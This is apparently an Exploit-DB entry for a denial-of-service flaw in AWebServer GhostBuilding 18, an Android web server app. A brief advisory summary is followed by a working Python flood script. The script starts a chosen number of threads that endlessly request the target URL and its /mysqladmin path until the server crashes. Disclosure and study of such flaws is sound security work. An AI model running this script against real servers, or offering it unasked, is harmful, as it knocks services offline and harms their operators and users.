AWebServer GhostBuilding 18 - Denial of Service (DoS)

vendor:

AWebServer GhostBuilding 18

by:

Andres Ramos [Invertebrado]

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: AWebServer GhostBuilding 18

Affected Version From: AWebServer GhostBuilding 18

Affected Version To: AWebServer GhostBuilding 18

Patch Exists: YES

Related CWE:

CPE: a:sylkat_tools:awebserver_ghostbuilding_18

Metasploit:

Other Scripts:

Platforms Tested: Android

2021

AWebServer GhostBuilding 18 – Denial of Service (DoS)

AWebServer GhostBuilding 18 is vulnerable to a remote denial of service (DoS) attack. An attacker can send a specially crafted request to the server, causing it to crash and become unresponsive. This vulnerability affects all versions of AWebServer GhostBuilding 18.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of AWebServer GhostBuilding 18.

Source

Exploit-DB raw data:

# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android

#!/usr/bin/python3

# *********************************************************************************
# * 	               	 Author: Andres Ramos [Invertebrado]                      *
# *  AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash  *
# *********************************************************************************

import signal
import requests
from pwn import *

#Colors
class colors():
        GREEN = "\033[0;32m\033[1m"
        END = "\033[0m"
        RED = "\033[0;31m\033[1m"
        BLUE = "\033[0;34m\033[1m"
        YELLOW = "\033[0;33m\033[1m"
        PURPLE = "\033[0;35m\033[1m"
        TURQUOISE = "\033[0;36m\033[1m"
        GRAY = "\033[0;37m\033[1m"

exit = False

def def_handler(sig, frame):
	print(colors.RED + "\n[!] Exiting..." + colors.END)
	exit = True
	sys.exit(0)

	if threading.activeCount() > 1:
		os.system("tput cnorm")
		os._exit(getattr(os, "_exitcode", 0))
	else:
		os.system("tput cnorm")
		sys.exit(getattr(os, "_exitcode", 0))

signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) < 3:
	print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
	sys.exit(1)

url = sys.argv[1]
Tr = sys.argv[2]

def http():
	counter = 0
	p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
	while True:
		r = requests.get(url)
		r = requests.get(url + "/mysqladmin")
		counter += 2
		p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)

		if exit:
			break

if __name__ == '__main__':

	threads = []

	try:
		for i in range(0, int(Tr)):
			t = threading.Thread(target=http)
			threads.append(t)

			sys.stderr = open("/dev/null", "w")

		for x in threads:
			x.start()

		for x in threads:
			x.join()

	except Exception as e:
		log.failure(str(e))
		sys.exit(1)